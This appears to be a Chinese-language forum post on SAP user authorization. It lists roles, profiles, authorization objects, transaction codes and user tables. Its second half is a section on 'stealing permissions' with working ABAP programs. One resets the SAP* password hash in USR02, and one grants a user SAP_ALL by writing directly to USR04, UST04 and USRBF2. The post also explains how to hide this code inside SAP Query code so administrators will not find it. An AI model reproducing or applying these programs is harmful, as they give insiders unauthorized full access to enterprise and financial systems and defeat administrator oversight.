用戶(hù)權(quán)限解剖:
通常basis會(huì)使用PFCG做權(quán)限管理,時(shí)你保存時(shí)會(huì)產(chǎn)生一個(gè)系統(tǒng)外的prifile name,
記得SU01時(shí)用戶(hù)有profile 和role兩欄位嗎?它們的關(guān)系如何呢?
首先明白幾個(gè)概念.
1.activity
這樣說(shuō)吧,我們從activity談起,activity是什么意思這個(gè)你查下
字典也就知道了,對(duì)就是規(guī)定可做什么動(dòng)作,比如說(shuō)不能吸煙只能喝酒,不能多于2兩,
不對(duì),這是我老婆講的,SAP不是這樣子的,是只能insert, update,display什么的.
這些東西當(dāng)年德國(guó)佬是寫(xiě)在tobj表中的.
activity 也是可分activity group的.
2.activity category &Authorization group
Role Vs Profile
你看看表T020就知道了,就是什么K,D, A, M什么的.
profile是什么呢?實(shí)際上可以理解為所有的authorization data(有很多authorization group--{你可使用OBA7填寫(xiě),
權(quán)限太細(xì)也不是好事^_^}和activity組成)的一個(gè)集合的名字,通常一個(gè)自定義的role產(chǎn)
生一個(gè)profile,SAP權(quán)限控制是根據(jù)profile里的authorization data(objects)來(lái)控制的.
role又是什么呢?role只是一個(gè)名字而已,然后將profile賦予給它, 比如你SU01建立一個(gè)
用戶(hù),我沒(méi)有任何role,但是加如SAP_All profile
也是可做任何事情.
SAP本身有很多default role & profile.
3.最常用的PFCG->authorizations->change authorization data->
進(jìn)入后選取selection criteria 可看到所有的authorization object
manually可手工加authorization object,比如你使用某個(gè)t-code權(quán)限出錯(cuò)誤,abap使用SU53檢查就
知道缺少哪個(gè)authorization objec,然后手工加入就可以.
你選去authorization levels就可by account type再細(xì)分權(quán)限.
有些甚至直接到表字段.而且你甚至可給一個(gè)object分配緩存buffer.
那么SAP是如何做到權(quán)限控制的呢,屠夫就用到小宰一下.
4.關(guān)于權(quán)限方面的幾個(gè)t-code.
(一)Role(角色)相關(guān)T-code:
PFAC 標(biāo)準(zhǔn)
PFAC_CHG 改變
PFAC_DEL 刪除
PFAC_DIS 顯示
PFAC_INS 新建
PFAC_STR
PFCG 創(chuàng)建
ROLE_CMP 比較
SUPC 批量建立角色profile
SWUJ 測(cè)試
SU03 檢測(cè)authorzation data
SU25, SU26 檢查updated profile
(二)建立用戶(hù)相關(guān)T-code:
SU0
SU01
SU01D
SU01_NAV
SU05
SU50, Su51, SU52
SU1
SU10 批量
SU12 批量
SUCOMP:維護(hù)用戶(hù)公司地址
SU2 change用戶(hù)參數(shù)
SUIM 用戶(hù)信息系統(tǒng)
用戶(hù)組
SUGR:維護(hù)
SUGRD:顯示
SUGRD_NAV:還是維護(hù)
SUGR_NAV:還是顯示
(三)關(guān)于profile&Authoraztion Data
SU02:直接創(chuàng)建profile不用role
SU20:細(xì)分Authorization Fields
SU21(SU03):****維護(hù)Authorization Objects(TOBJ,USR12).
對(duì)于憑證你可細(xì)分到:
F_BKPF_BED: Accounting Document: Account Authorization for Customers
F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
F_BKPF_BLA: Accounting Document: Authorization for Document Types
F_BKPF_BUK: Accounting Document: Authorization for Company Codes
F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
F_BKPF_GSB: Accounting Document: Authorization for Business Areas
F_BKPF_KOA: Accounting Document: Authorization for Account Types
F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然后你進(jìn)去還可細(xì)分,這些個(gè)東西是save在USR12表中的. 在DB層是UTAB.
對(duì)具體transaction code細(xì)分:
SU22,SU24
SU53:*** 就是你出錯(cuò)用來(lái)檢查沒(méi)有那些authoraztion objects.
SU56:分析authoraztion data buffers.
SU87:用來(lái)檢查用戶(hù)改變產(chǎn)生的history
SU96,SU97,SU98,SU99:干啥的?
SUPC:批量產(chǎn)生role
DB和logical層:
SUKRI:Transaction Combinations Critical for Security
tables:
TOBJ : All avaiable authorzation objects.(全在此)
USR12: 用戶(hù)級(jí)authoraztion值
-----------------------------
USR01:主數(shù)據(jù)
USR02:密碼在此
USR04:授權(quán)在此
USR03:User address data
USR05:User Master Parameter ID
USR06:Additional Data per User
USR07:Object/values of last authorization check that failed
USR08:Table for user menu entries
USR09:Entries for user menus (work areas)
USR10:User master authorization profiles
USR11:User Master Texts for Profiles (USR10)
USR12:User master authorization values
USR13:Short Texts for Authorizations
USR14:Surchargeable Language Versions per User
USR15:External User Name
USR16:Values for Variables for User Authorizations
USR20:Date of last user master reorganization
USR21:Assign user name address key
USR22:Logon data without kernel access
USR30:Additional Information for User Menu
USR40:Table for illegal passwords
USR41:當(dāng)前用戶(hù)
USREFUS:
USRBF2
USRBF3
UST04:User Profile在此
UST10C: Composite profiles
UST10S: Single profiles (角色對(duì)應(yīng)的
UST12 : Authorizations..............................
..............................
如何竊取權(quán)限
..............................
用戶(hù):
User type用戶(hù)類(lèi)型(干啥用的不講):
通常的用戶(hù)類(lèi)型有
a.dialog (就是normal user)
b.communication
c.system
d.service
e.reference.
通常你在使用任何T-code前一定會(huì)有權(quán)限檢測(cè)的.
AUTHORITY_CHECK:這個(gè)函數(shù)只是小檢查一下你的user有沒(méi)有,什么時(shí)候過(guò)期.
**如果coding只要使用此函數(shù)就夠了.
AUTHORITY_CHECK_TCODE:檢查T(mén)-code
這倆函數(shù)是真正檢查autorization objects的.
SUSR_USER_AUTH_FOR_OBJ_GET:
AUTHORIZATION_DATA_READ_SELOBJ:
------------------------------------------
將SAP*的密碼改成123的程序,很簡(jiǎn)單.
我們找到那個(gè)user logon表USR02.
(DF52478E6FF90EEB是經(jīng)過(guò)SAP加密保存在DB的,哪位老兄研究過(guò)SAP的密碼加密?)
report zmodSAP*.
data zUSR02 like USR02 .
select single * into zUSR02 from USR02
where BNAME = 'SAP*'.
zUSR02-Bcode = 'DF52478E6FF90EEB' .
Update USR02 from zUSR02 .
現(xiàn)在的問(wèn)題是如何讓你那basis不發(fā)現(xiàn),很簡(jiǎn)單,將code隱藏在Query里面,就是說(shuō)你做一個(gè)
query,query是會(huì)產(chǎn)生code的,然后你加入此代碼,誰(shuí)能想到???然后你就等你的basis去哭...
這樣做太狠毒了.還是自己偷偷搞自己的用戶(hù)吧.
在此你必須對(duì)權(quán)限結(jié)構(gòu)非常清晰.
權(quán)限和三個(gè)表有關(guān)系.
a.USR04
b.USR04
c.USRBF2 這個(gè)表是對(duì)應(yīng)到所用的authorzization objects的.
*&---------------------------------------------------------------------*
*& Report : Steal SAP ALL Right *
*& Creation Date : 2004.04.01 *
*& Created by : Stone.Fu *
*& Description : 可竊取SAP ALL權(quán)限 *
*& Modified Date : 2005.11.02
*& Description : 將此code hide在report painter or query code *
*&---------------------------------------------------------------------*
report zrightsteal.
data zUSR04 like USR04 . "????????work area??
data zUST04 like USR04 .
data zPROFS like USR04-PROFS.
data ZUSRBF2 like USRBF2 occurs 0 with header line.
"USRBF2?????internal table
** Update Authorization table USR04.
select single * into zUSR04 from USR04
where BNAME = 'ZABC2'. "SAP All 權(quán)限
move 'C SAP_ALL' to zPROFS .
ZUSR04-NRPRO = '14'.
zUSR04-PROFS = zPROFS.
Update USR04 from zUSR04 .
**Update User authorization masters table UST04 .
select single * into zUST04 from UST04
where BNAME = 'ZABC2'.
zUST04-PROFILE = 'SAP_ALL'. "SAP all 權(quán)限
Update UST04 from zUST04 .
*?????insert
*ZUST04-MANDT = '200'.
*ZUST04-BNAME = 'ZABC2'.
*ZUST04-PROFILE = 'SAP_ALL'.
*Insert UST04 from ZUST04 .
select * from USRBF2 into table ZUSRBF2
where BNAME = 'SAP*' .
Loop at ZUSRBF2.
ZUSRBF2-BNAME = 'ZABC2'.
Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
endloop.
INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.
自己建立一個(gè)ztest用戶(hù)不給它任何權(quán)限然后在test machine上run 報(bào)表zrightsteal.
然后ztest就是SAP_ALL了, 然后你將code hide在SQP query的code中. ABAP code太容易被人發(fā)現(xiàn). K, 現(xiàn)在我碰到一個(gè)大問(wèn)題了, 記帳程序被改的出了問(wèn)題..